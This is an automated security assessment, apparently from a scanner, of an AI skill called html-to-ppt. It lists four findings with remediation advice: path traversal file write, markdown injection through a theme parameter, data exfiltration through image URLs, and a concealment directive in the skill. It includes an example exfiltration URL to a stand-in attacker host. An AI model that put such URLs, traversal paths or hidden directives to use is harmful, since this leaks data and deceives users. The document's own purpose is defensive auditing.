Trust Assessment
html-to-ppt received a trust score of 73/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 4 findings: 0 critical, 1 high, 2 medium, and 1 low severity. Key findings include Covert behavior / concealment directives, Arbitrary file write due to unvalidated output path, Markdown content injection possible via unvalidated 'theme' parameter.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. All layers scored 70 or above, reflecting consistent security practices.
Last analyzed on February 14, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings (4)
| Severity | Finding | Layer | Location |
|---|---|---|---|
| HIGH | **Arbitrary file write due to unvalidated output path.** The `markdown_to_pptx` function takes an `output_path` argument directly from user input and uses it to specify the output file location for `marp-cli`. There is no validation or sanitization of this path, allowing an attacker to specify arbitrary file paths, including absolute paths or paths using `../` traversal, to write files to any location on the file system where the skill has write permissions. This could lead to overwriting critical system files, creating malicious files in sensitive directories, or other forms of system compromise. **Remediation:** Implement strict validation and sanitization of the `output_path` argument. This could involve ensuring the path is relative to a designated, sandboxed output directory, disallowing absolute paths, disallowing path traversal sequences (`../`), and using `os.path.abspath` to check if the resolved path is within an allowed directory. Consider using `tempfile.mkdtemp()` to create a secure temporary directory for all output, and only allowing the user to specify a filename within that directory. | LLM | SKILL.md:275 |
| MEDIUM | **Markdown content injection possible via unvalidated 'theme' parameter.** The `markdown_to_pptx` function constructs the initial markdown frontmatter using an f-string: `f"---\nmarp: true\ntheme: {theme}\n---\n\n"`. If the `theme` parameter, which is derived from user input, contains newline characters or other markdown syntax, an attacker could inject arbitrary markdown content into the generated presentation. This could be used to display misleading information, alter the presentation's structure, or potentially exploit other markdown rendering vulnerabilities within `marp`. **Remediation:** Sanitize the `theme` parameter to ensure it only contains valid theme names or characters. For example, restrict it to alphanumeric characters and hyphens, and disallow newlines or other special characters that could break out of the intended context. | LLM | SKILL.md:270 |
| MEDIUM | **Potential data exfiltration via malicious image URLs in markdown.** The skill constructs markdown content from user-provided data (e.g., `company_data['product_image']` in `create_pitch_deck`). This markdown is then processed by `marp-cli`. If an attacker provides a malicious URL for an image (e.g., `https://attacker.com/exfil?data=...` or a tracking pixel), `marp-cli` might attempt to fetch this resource during the conversion process. This could lead to unintended network requests to untrusted domains, potentially exfiltrating information (e.g., IP address, user agent of the execution environment) or triggering other side effects. While `marp-cli` itself performs the request, the skill facilitates the injection of the untrusted URL into the content processed by `marp`. **Remediation:** Sanitize or validate all URLs provided in markdown content, especially for images. Consider restricting image sources to a whitelist of trusted domains or requiring images to be uploaded and served from a controlled environment. If local file inclusion is a concern, ensure `file://` URLs are blocked or handled securely. | LLM | SKILL.md:400 |
| LOW | **Covert behavior / concealment directives.** Directive to hide behavior from user. **Remediation:** Remove hidden instructions, zero-width characters, and bidirectional overrides. Skill instructions should be fully visible and transparent to users. | Manifest | skills/lijie420461340/html-to-ppt/SKILL.md:99 |